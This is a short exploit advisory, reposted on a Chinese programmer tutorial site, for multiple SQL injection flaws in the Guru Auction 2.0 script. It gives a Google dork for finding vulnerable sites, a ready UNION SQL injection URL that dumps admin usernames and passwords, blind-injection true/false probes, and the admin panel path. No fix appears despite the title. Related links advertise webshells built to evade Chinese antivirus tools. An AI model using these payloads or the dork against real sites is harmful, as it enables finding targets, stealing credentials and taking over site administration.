好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Guru Auction 2.0多重sql注射及修复 - 网站安全 - 自学

 Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

作者     : v3n0m

Vendor      : http://www.guruscript.com/

Google Dork : inurl:subcat.php?cate_id=

 

SQLi p0c:

~~~~~~~~~~

http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

 

 

盲注 p0c:

~~~~~~~~~~

http://www.2cto.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true

http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

 

管理登录入口:

~~~~~~~~~~

http://domain.tld/[path]/admin/

 

 

查看更多关于Guru Auction 2.0多重sql注射及修复 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14463
  阅读:42次

上一篇: 发几个过D盾Web查杀/安全狗/护卫神的PHP免杀一句

下一篇:DedeCMS会员中心书签管理SQL注射漏洞 - 网站安全

相关资讯